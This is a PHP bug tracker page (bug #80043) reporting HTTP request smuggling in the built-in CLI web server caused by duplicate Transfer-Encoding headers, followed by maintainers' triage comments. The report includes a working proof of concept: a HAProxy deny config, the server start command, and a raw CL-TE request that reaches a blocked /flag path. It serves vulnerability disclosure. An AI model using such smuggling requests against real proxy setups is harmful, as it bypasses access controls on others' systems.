PHP :: Bug #80043 :: HTTP Request Smuggling in php webserver

Bug #80043

HTTP Request Smuggling in php webserver

Submitted:

2020-09-01 07:09 UTC

Modified:

2021-11-15 15:42 UTC

Votes:	1
Avg. Score:	5.0 ± 0.0
Reproduced:	1 of 1 (100.0%)
Same Version:	1 (100.0%)
Same OS:	1 (100.0%)

From:

kn0wns1c at gmail dot com

Assigned:

Status:

Open

Package:

Built-in web server

PHP Version:

master-Git-2020-09-01 (Git)

OS:

Private report:

CVE-ID:

None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	kn0wns1c at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2020-09-01 07:09 UTC] kn0wns1c at gmail dot com

Description:
------------
functions php_http_parser_execute in sapi\cli\php_http_parser.c parse http request. when I send to two Transfer-Encoding header, one true one false, in one http request, it will thouth that is a legal request. a attacker may use this feature make a HTTP Request Smuggling attack.

for example, using haproxy to make CL-TE attack:

haproxy 1.5.3 version haproxy.cfg
haproxy.cfg forbid access /flag URI

```
global
 daemon
 maxconn 256

defaults
 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 127.0.0.1:8080 maxconn 32

```
run php webserver

```
php -S 127.0.0.1:8080
```

use this http request can bypass haproxy /flag restrict

```
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1


```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2020-09-01 07:12 UTC] stas@php.net

-Type: Security +Type: Bug

[2020-09-01 07:12 UTC] stas@php.net

PHP CLI server is a debug feature and as such bugs in it are not security issues. See https://www.php.net/manual/en/features.commandline.webserver.php

[2021-11-15 15:42 UTC] cmb@php.net

> Transfer-Encoding: chunked-false

According to RFC 7230, section 3.3.1[1], the built-in Webserver
should respond with 501 (Not implemented), since it doesn't
support this tranfer coding.  However, such faked values are a
very minor problem here.  The bigger problem is that the built-in
Webserver does not even understand generally know values, such as

  Transfer-Encoding: gzip, chunked

but does not reply with 501 either.  The only understood
Transfer-Encoding value is `chunked`.  We may consider to change
this to doc problem.

[1] <https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.1>

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 18:01:29 2024 UTC